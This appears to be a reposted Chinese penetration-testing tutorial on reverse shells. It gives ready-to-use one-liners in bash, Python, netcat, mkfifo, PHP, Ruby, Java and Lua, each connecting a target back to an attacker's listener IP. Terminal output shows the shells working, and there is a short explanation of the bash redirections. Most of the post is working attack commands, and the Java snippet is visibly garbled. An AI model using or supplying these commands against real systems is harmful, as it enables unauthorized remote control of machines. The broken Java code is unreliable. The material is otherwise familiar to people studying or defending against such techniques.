反弹Shell

反弹Shell

反弹Shell

大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。今天再告诉大家几种方法

环境说明:

check1:192.168.233.10   C6  2.6.32-696.30.1.el6.x86_64  本地
check2:192.168.233.20   C7  3.10.0-862.3.3.el7.x86_64   远程

BASH:

首先要在本地配置好nc工具,配置方法之前的文章有

在本地使用nc监听一个端口:

[root@wcy ~]# nc -lvv 6699

在远程机器上操作:

[root@localhost ~]# bash -i >& /dev/tcp/192.168.233.10/6699 0>&1

本地可以看到远程机器的shell已经返回到本地上面

[root@wcy ~]# nc -lvv 6699
Connection from 192.168.233.20 port 6699 [tcp/*] accepted
[root@localhost ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host 
valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:6b:b8:d5 brd ff:ff:ff:ff:ff:ff
inet 192.168.233.20/24 brd 192.168.233.255 scope global noprefixroute ens32
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe6b:b8d5/64 scope link 
valid_lft forever preferred_lft forever
[root@localhost ~]#

原理:

  1. A主机开启9090端口的tcp服务

  2. B主机连接到A主机的9090的tcp服务

  3. A主机通过tcp服务把命令发到B主机

  4. B主机读取命令并且在bash中执行

  5. B主机把执行结果发给A主机

Linux文件描述符,Linux shell的三种标准的文件描述符

0 - stdin 代表标准输入,使用<或<<
1 - stdout 代表标准输出,使用>或>>
2 - stderr 代表标准错误输出,使用2>或2>>

参数解释:

bash -i  

bash -i代表在本地打开一个bash,

>&   

当>&后面接文件时,表示将标准输出和标准错误输出重定向至文件。 当>&后面接文件描述符时,表示将前面的文件描述符重定向至后面的文件描述符

也有师傅把&这个符号解释为是取地址符号,学过C语言的小伙伴们都知道&这个符号代表取地址符,在C++中&符号还代表为引用,这样做是为了区分文件描述符和文件,比如查看一个不存在的文件,要把标准错误重定向到标准输出,如果直接cat notexistfile 2>1的话,则会将1看作是一个文件,将标准错误输出输出到1这个文件里而不是标准输出,而&的作用就是为了区分文件和文件描述

[root@wcy ~]# cat check 2>1
[root@wcy ~]# cat 1
cat: check: 没有那个文件或目录
[root@wcy ~]# cat check
cat: check: 没有那个文件或目录
[root@wcy ~]# 

  

/dev/tcp/192.168.233.10/6699 

就是/dev/tcp/ip/port, /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,>&后面跟上/dev/tcp/ip/port这个文件代表将标准输出和标准错误输出重定向到这个文件,也就是传递到远程上,如果远程开启了对应的端口去监听,就会接收到这个bash的标准输出和标准错误输出,这个时候我们在本机C6输入命令,输出以及错误输出的内容就会被传递显示到远程。

0>&1

代表将标准输入重定向到标准输出,这里的标准输出已经重定向到了/dev/tcp/ip/port这个文件,也就是远程,那么标准输入也就重定向到了远程,这样的话就可以直接在远程输入了:

那么,0>&2也是可以的,代表将标准输入重定向到标准错误输出,而标准错误输出重定向到了/dev/tcp/ip/port这个文件,也就是远程,那么标准输入也就重定向到了远程

 

python实现反弹shell:

首先本地还需要监听一个端口

[root@wcy ~]# nc -lvv 6699

远程机器执行

[root@localhost ~]# python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.233.10',6699));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i'])"

成功反弹

[root@wcy ~]# nc -lvv 6699
Connection from 192.168.233.20 port 6699 [tcp/*] accepted
[root@localhost ~]# ip a | grep inet
ip a | grep inet
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host 
inet 192.168.233.20/24 brd 192.168.233.255 scope global noprefixroute ens32
inet6 fe80::20c:29ff:fe6b:b8d5/64 scope link 
[root@localhost ~]#

  

nc版:

本地主机打开一个监听端口

[root@wcy ~]# nc -lvv 6699

远程主机连接此端口,连接后(-e)并打开/bin/bash

[root@localhost ~]# nc -e /bin/bash 192.168.233.10 6699

效果如下:

[root@wcy ~]# nc -lvv 6699
Connection from 192.168.233.20 port 6699 [tcp/*] accepted
ls
anaconda-ks.cfg
epel-release-latest-7.noarch.rpm
krb5-libs-1.15.1-19.el7.x86_64.rpm
nohup.out
test.sh
ip a | grep inet
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host 
inet 192.168.233.20/24 brd 192.168.233.255 scope global noprefixroute ens32
inet6 fe80::20c:29ff:fe6b:b8d5/64 scope link

或者

[root@localhost ~]# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.233.10 6699 >/tmp/f

效果如下:

[root@wcy ~]# nc -lvv 6699
Connection from 192.168.233.20 port 6699 [tcp/*] accepted
sh-4.2# ls
ls
anaconda-ks.cfg
epel-release-latest-7.noarch.rpm
krb5-libs-1.15.1-19.el7.x86_64.rpm
nohup.out
test.sh
sh-4.2# ip a | grep inet
ip a | grep inet
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host 
inet 192.168.233.20/24 brd 192.168.233.255 scope global noprefixroute ens32
inet6 fe80::20c:29ff:fe6b:b8d5/64 scope link 
sh-4.2#

 

 

PHP版:

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

  

ruby版

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

  

java版本:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5
le read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

  

lua版本:

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

 

转载于:https://www.cnblogs.com/LuckWJL/p/9395412.html

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/101516.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • Facebook 秘钥散列

    Facebook 秘钥散列先下载OpenSSL工具执行这个命令keytool-exportcert-aliasandroiddebugkey-keystoredebug.keystore>c:\openssl\bin\debug.txt其中androiddebugkey是你xxx.keystore文件的路径,debug是你.keystore文件的名字然后路径cd到openssl文件夹下的bin目录执行opensslsha1-binarydebug.txt>debug_sha.t

  • windows 2008文件服务器审计

    windows 2008文件服务器审计windows2008或者windows2008r2,系统做域内的文件服务器,能否做到谁删除某个共享出来的文件夹或者文件的操作审计?审计级别能做到怎么样一个程度?回答:依据您的问题您想知道Windows2008文件服务器的审计相关。依据我的经验,这个要分成两种情况:1.在远端访问,就是通过网络路径访问;2.在本地上本地访问共享文件,就是在创建的机器上访问;远端访问访问共享文件…

  • 2019美赛A题—学习记录

    2019美赛A题—学习记录2019美赛a题论文来源:https://github.com/MATHmodelsAbstract【废话干货1:9开】一句话引入概述问题-概述方法-概述结果【三个模型,模型分析因素,解决的问题】灵敏度分析【修改参数看影响】一句话意义Introduction1.问题重述原问题问题A:生态博弈在虚构的电视连续剧《权力的游戏》中,以史诗幻想小说《冰与火之歌》系列…

  • pycharm中安装模块_pycharm本地安装第三方模块

    pycharm中安装模块_pycharm本地安装第三方模块1.打开pycharm,点击File,再点击settings2.点击settings之后再点击project下面的projectInterpreter将会出现如下界面:3.点击“+”号,搜索并安装相应的模块转载于:https://www.cnblogs.com/mrruning/p/7624844.html…

  • 数据库锁概述[通俗易懂]

    数据库锁概述[通俗易懂]行锁和表锁主要是针对锁粒度划分的,一般分为行锁、表锁、库锁行锁:访问数据库的时候,锁定整个行数据,防止并发错误。表锁:访问数据库的时候,锁定整个表数据,防止并发错误。二者的区别:表锁:开销小,加锁快,不会出现死锁;锁定粒度大,发生锁冲突概率高,并发度最低。行锁:开销大,加锁慢,会出现死锁;锁定粒度小,发生锁冲突的概率低,并发度高。乐观锁和悲观锁乐观锁:顾名思义,就是很乐观,每次去拿数据的时候都认为别人不会修改,所以不会上锁,但是在更新的时候会判断一下在此期间别人有没有更新这个数据,可以使用版

  • spring管理quartz生命周期之`SchedulerFactoryBean`

    spring管理quartz生命周期之`SchedulerFactoryBean`spring管理quartz生命周期之SchedulerFactoryBeanspring通过SchedulerFactoryBean来管理quartz的生命周期。在spring容器启动时启动调度器,在spring容器关闭时停止调度器FactoryBeanthatcreatesandconfiguresaQuartz{@linkorg.quartz.Scheduler}…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号